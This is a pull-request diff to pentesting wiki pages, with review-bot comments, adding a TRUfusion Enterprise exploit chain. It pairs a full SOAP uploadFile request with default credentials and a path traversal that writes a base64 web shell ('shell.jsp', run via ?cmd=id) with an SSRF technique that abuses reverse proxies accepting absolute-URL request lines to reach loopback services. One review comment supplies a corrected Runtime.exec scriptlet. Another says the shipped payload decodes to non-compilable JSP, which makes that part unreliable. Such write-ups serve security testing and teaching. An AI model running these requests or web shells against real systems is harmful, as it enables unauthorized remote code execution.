28 changes: 28 additions & 0 deletions src/pentesting-web/file-upload/README.md
Expand Up @@ -301,6 +301,33 @@ Mitigations
- Canonicalize and enforce that the resolved path stays within an allow-listed base directory.
- Store uploads on a non-executable volume and deny script execution from writable paths.

### Axis2 SOAP uploadFile traversal to Tomcat webroot (JSP drop)

Axis2-based upload services sometimes expose an `uploadFile` SOAP action that takes three attacker-controlled fields: `jobDirectory` (destination directory), `archiveName` (filename), and `dataHandler` (base64 file content). If `jobDirectory` is not canonicalized, you get arbitrary file write via path traversal and can land a JSP in Tomcat’s webapps.

Minimal request outline (default creds often work: `admin` / `trubiquity`):

```http
POST /services/WsPortalV6UpDwAxis2Impl HTTP/1.1
Host: 127.0.0.1
Content-Type: text/xml

<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:updw="http://updw.webservice.ddxPortalV6.ddxv6.procaess.com">
<soapenv:Body>
<updw:uploadFile>
<updw:login>admin</updw:login>
<updw:password>trubiquity</updw:password>
<updw:archiveName>shell.jsp</updw:archiveName>
<updw:jobDirectory>/../../../../opt/TRUfusion/web/tomcat/webapps/trufusionPortal/jsp/</updw:jobDirectory>
<updw:dataHandler>PD8lQCBwYWdlIGltcG9ydD0iamF2YS5pby4qIjsgc3lzdGVtKHJlcXVlc3QuZ2V0UGFyYW1ldGVyKCJjbWQiKSk7Pz4=</updw:dataHandler>
</updw:uploadFile>
</soapenv:Body>
</soapenv:Envelope>
```

- Bindings are often localhost-only; pair with a full-read SSRF (absolute-URL request line, Host header ignored) to reach `127.0.0.1` if the Axis2 port isn’t exposed.
- After writing, browse to `/trufusionPortal/jsp/shell.jsp?cmd=id` to execute.

## Tools

- [Upload Bypass](https://github.com/sAjibuu/Upload_Bypass) is a powerful tool designed to assist Pentesters and Bug Hunters in testing file upload mechanisms. It leverages various bug bounty techniques to simplify the process of identifying and exploiting vulnerabilities, ensuring thorough assessments of web applications.
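Review bot: the `<updw:dataHandler>` value in the sample request decodes to `<?%@ page import="java.io.*"; system(request.getParameter("cmd"));?>`, which is not compilable JSP (PHP-style `<?` / `?>` delimiters mixed with a `<%@ page` directive that is never closed by `%>`, and there is no `system()` in Java), so the follow-up step `/trufusionPortal/jsp/shell.jsp?cmd=id` would yield a Jasper compile error rather than command output; either replace it with the base64 of a minimal scriptlet such as `<%@ page import="java.io.*" %><% Runtime.getRuntime().exec(request.getParameter("cmd")); %>` (stdout still has to be read back and written to the response) or say explicitly that the value is a placeholder. Two smaller points: the heading and the first sentence present this as a generic Axis2 pattern, but every concrete detail in the request (the `WsPortalV6UpDwAxis2Impl` service path, the `admin` / `trubiquity` credentials, the `/opt/TRUfusion/web/tomcat/webapps/...` target) belongs to one product, so name TRUfusion Enterprise in the heading or opening paragraph and point at the reference added below instead of letting readers assume the endpoint and default creds generalize; and the `http` block carries no `Content-Length` (or `SOAPAction`) header, which Burp will add but a raw netcat paste will not.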
Expand Down Expand Up @@ -570,5 +597,6 @@ Backend copies `file.filepath`, so the response returns that path’s content. C
- [HTB: Media — WMP NTLM leak → NTFS junction to webroot RCE → FullPowers + GodPotato to SYSTEM](https://0xdf.gitlab.io/2025/09/04/htb-media.html)
- [Microsoft – mklink (command reference)](https://learn.microsoft.com/windows-server/administration/windows-commands/mklink)
- [0xdf – HTB: Certificate (ZIP NUL-name and stacked ZIP parser confusion → PHP RCE)](https://0xdf.gitlab.io/2025/10/04/htb-certificate.html)
- [When Audits Fail: From Pre-Auth SSRF to RCE in TRUfusion Enterprise](https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/)

{{#include ../../banners/hacktricks-training.md}}
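Review bot: the new reference is appended to the list but nothing in the section added above cites it; since the section heading is generic while the request body is product-specific, add an inline link to this entry (or at least name the source) in the section's first paragraph so the reader can tell where the service path, credentials and webroot come from.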
21 changes: 21 additions & 0 deletions src/pentesting-web/ssrf-server-side-request-forgery/README.md
Expand Up @@ -309,6 +309,26 @@ Host: target.com
Connection: close
```

### Reverse proxies that accept absolute URLs in the request line (open forward-proxy)

Some reverse proxies also accept **absolute-form request lines** (`GET http://10.0.0.5:8080/path HTTP/1.1`) and forward the URL as-is to a backend instead of rejecting it or rewriting it to the configured upstream. This turns the reverse proxy into a **pre-auth forward proxy with full-read SSRF**, including access to `localhost`-bound services that would normally be unreachable from the Internet.

Key points:
- **Request line controls destination**: the authority in the absolute URL overrides normal routing; the `Host` header is usually ignored.
- **Full response returned**: responses from internal hosts are streamed back, so you can enumerate and interact (e.g., SOAP/Axis2, Keycloak, admin consoles) rather than blind-probing.
- **Works on localhost**: `GET http://127.0.0.1:port/ HTTP/1.1\r\nHost: public-host\r\n\r\n` is enough to hit loopback-only listeners.
- **Abuse as pivot**: combine with other vulns (e.g., upload endpoints) to reach intra-host services.

Minimal probe:

```http
GET http://127.0.0.1:8080/ HTTP/1.1
Host: whatever
Connection: close
```

If you see the upstream response instead of a 400, the appliance is acting as an open proxy.

## DNS Rebidding CORS/SOP bypass

If you are having **problems** to **exfiltrate content from a local IP** because of **CORS/SOP**, **DNS Rebidding** can be used to bypass that limitation:
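Review bot: the closing test ("If you see the upstream response instead of a 400, the appliance is acting as an open proxy") gives a false negative in the common case: HTTP/1.1 servers are required to accept absolute-form request targets (RFC 7230 §5.3.2), and most reverse proxies then route by their own configuration anyway, so the reply to `GET http://127.0.0.1:8080/ HTTP/1.1` is usually the public site's normal page, neither a 400 nor the loopback listener. The probe needs a baseline: send the same request line once with a port known to be closed (or with an authority you control and can watch being resolved) and only conclude the appliance dials the authority when status, body or timing differ from the normal origin-form response. Minor consistency point: the bullet list uses `Host: public-host` while the probe block uses `Host: whatever`; pick one, and note that the value is irrelevant because a proxy handling an absolute-form target must ignore `Host` and use the request-target's authority (RFC 7230 §5.4), which is the mechanism behind the "`Host` header is usually ignored" bullet.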
Expand Down Expand Up @@ -471,5 +491,6 @@ https://github.com/incredibleindishell/SSRF_Vulnerable_Lab
- [Positive Technologies – Blind Trust: What Is Hidden Behind the Process of Creating Your PDF File?](https://swarm.ptsecurity.com/blind-trust-what-is-hidden-behind-the-process-of-creating-your-pdf-file/)
- [Tenable – SSRF Vulnerability in Java TLS Handshakes That Creates DoS Risk](https://www.tenable.com/blog/tenable-discovers-ssrf-vulnerability-in-java-tls-handshakes-that-creates-dos-risk)
- [RFC 5280 §4.2.2.1 Authority Information Access](https://datatracker.ietf.org/doc/html/rfc5280#section-4.2.2.1)
- [When Audits Fail: From Pre-Auth SSRF to RCE in TRUfusion Enterprise](https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/)

{{#include ../../banners/hacktricks-training.md}}
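Review bot: the same reference is added to the SSRF list as well, while the two new sections it supports (the upload traversal in the file-upload page and this proxy-as-SSRF section) each describe one half of the same chain without linking to the other; add a cross-link from the "Abuse as pivot" bullet to the file-upload section and vice versa so the two pages do not drift apart when one is edited.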